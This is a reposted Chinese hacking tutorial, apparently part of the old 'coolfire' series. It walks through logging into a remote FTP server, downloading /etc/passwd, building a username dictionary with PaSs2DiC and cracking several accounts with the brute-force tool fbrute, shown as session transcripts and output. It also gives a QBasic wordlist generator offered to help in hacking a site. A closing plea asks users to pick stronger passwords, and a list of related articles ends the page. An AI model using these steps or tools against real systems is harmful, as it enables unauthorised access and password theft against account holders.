coolfire文章之三

转载 2007年09月19日 19:39:00
(还是使用刚刚的帐号进入)

Name (www.coffee.com.tw:YourName): coffee

331 Password required for coffee.

Password:

230 User coffee logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

(直接到达档案放置地点)

ftp> cd /etc

250 CWD command successful.

ftp> ls

200 PORT command successful.

150 Opening ASCII mode data connection for file list.

ttys

fdprm

group

issue

motd

mtools

profile

securetty

shells

termcap

skel

csh.cshrc

csh.login

lilo

inet

default

services

HOSTNAME

DIR_COLORS

passwd

passwd.OLD

wtmp

utmp

gettydefs

inittab.gettyps.sample

ld.so.conf

ld.so.cache

at.deny

fs

magic

rc.d

syslog.conf

printcap

inittab

sudoers

vga

diphosts

mail.rc

ppp

NNTP_INEWS_DOMAIN

sendmail.st

NETWORKING

gateways

bootptab

exports

ftpusers

host.conf

hosts

hosts.allow

hosts.deny

hosts.equiv

inetd.conf

named.boot

networks

nntpserver

protocols

resolv.conf

rpc

ftpaccess

hosts.lpd

ftpconversions

snooptab

msgs

ftpgroups

slip.login

slip.hosts

yp.conf.example

X11

lilo.conf

sendmail.cf

fstab

fastboot

mtab

syslog.pid

klogd.pid

shutdownpid

localtime

passwd.old

ioctl.save

psdevtab

ftp.banner

ftp.deny

issue.net

motd.bak

securetty.old

226 Transfer complete.

(取回该档案)

ftp> get passwd

200 PORT command successful.

150 Opening BINARY mode data connection for passwd (4081 bytes).

226 Transfer complete.

4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(尽速离开)

ftp> bye

221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧 !!

快点跑一下, 让它自动产生字典档案:

C:/hack>pass2dic

PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file

[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd

Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin   E-Mail: fetag@stsvr.showtower.com.tw

FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:/hack>

(这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force 看看!)
C:/hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine.  v2.0

Copyright (C) 1990, Prometheus.  DOS-fastcrypt made available by sir hackalot.

阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐

                                                                             

Attempts/Hits:  5184/9

                                                                             
Taking list input from dic.cfe

Beginning search of passwd for password: xxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password xxxxx found!  Username: xxxxx

Match for password xxx found!  Username: xxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password coffee found!  Username: coffee

Match for password xxxxxxx found!  Username: xxxxxxx

Match for password xxx found!  Username: xxx

Match for password xxxx found!  Username: xxxx

Done.

C:/hack>

看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是....@#$%^...&* 因某些关系

所以其它部份要被 "马赛克" 起来, 请各位读者见量!

**** 再谈密码 ****

看了以上的破解示范, 就可以  解到许多人还是对於 "密码" 这东西不是很有 "密码" 的观念, 人就是

那么的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用 QBasic 来设计

一个自动产生密码的小程式, 相信对许多人有很大的帮助, 底下我们再来浅显的介绍一下字母密码的

产生方法, 相信对於你在 Hack 某站会有更大的帮助.

事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大", 而让我有了写这一段的

想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆), 并且写出来让大家 

解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了, 而且语法大家也可能会比较

熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用, 而不会去修改或者写个好一点的出来!

先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式, 所以我们要  解字的字母排

列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:

  [1] apple   [2] guest  [3] james  [4] superman  [5] password 

OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 ! 我们首先这样说明: 母音在英文

上有 : A E I O U 这五个, 所有的英文单字都会有这些母音 (有些没有的可能是专有名词或缩写), 也有可

能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再来就是比较每个字的开头, 有可能是母音,

也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是两个子音再接一个母

音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st,

 sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e; est; ord; ard; ls; es; s...

等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !! 我大略写一个简单的, 其它大家

自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !!

底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120 个字的字典!!

--------------- MakeDic.BAS Start Here ---------------------------------------------------------------------------------------

DIM FirstWord$(20)

DIM MotherWord$(13)

DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k"

DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"

DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20

  READ FirstWord$(I)

  PRINT FirstWord$(I)

NEXT I

FOR I = 1 TO 13

  READ MotherWord$(I)

NEXT I

FOR I = 1 TO 12

  READ LastWord$(I)

NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20

   FOR J = 1 TO 13

       FOR K = 1 TO 12

           PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)

       NEXT K

   NEXT J

NEXT I

CLOSE : END

--------------- Cut Here, End of MakeDic.BAS --------------------------------------------------------------------------------

当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如: 子音+母音+子音+母音+子音, 作

出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式, 写好了请 Mail 一

份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !! 还是你只是要给我 ?!

希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看, 如果有相同的请

赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP 们.... 教教你们的使用者吧..... 唉~~~~
 

相关文章推荐

coolfire黑客入门的8篇文章

  • 2015-12-01 12:56
  • 622KB
  • 下载

coolfire八篇文章

  • 2014-05-21 21:46
  • 117KB
  • 下载

深度学习系列文章之三:caffe+ubantu14.04+cuda7.5+cudnn7.0v3+openvc3.0安装

一、Ubuntu14.04系统的安装。 二、CUDA7.5的安装 CUDA7.0的官网下载地址:https://developer.nvidia.com/cuda-downloads ...

coolfire的八篇文章

  • 2010-10-23 11:29
  • 117KB
  • 下载

coolfire八篇文章

  • 2014-06-09 15:58
  • 117KB
  • 下载

Hadoop系列文章之三:技术未来

Hadoop的未来如何,一个重要的影响因素是技术的更新和进步。从最近几年Hadoop和其他大数据相关技术的发展,我们可以看出一些端倪。  数据存储 – 前景乐观  从文件存储技术来看,HD...

coolfire八篇文章

  • 2014-01-24 21:26
  • 117KB
  • 下载

coolfire八篇文章

  • 2009-08-07 09:33
  • 117KB
  • 下载

Mesos&PaaS系列文章之三——Slave节点安装

Slave节点负责接收并执行来自mesos-master的命令、管理节点上的mesos-task,并为各个task分配资源。mesos-slave将自己的资源量发送给mesos-master,由mes...

coolfire八篇文章

  • 2013-01-07 11:55
  • 117KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)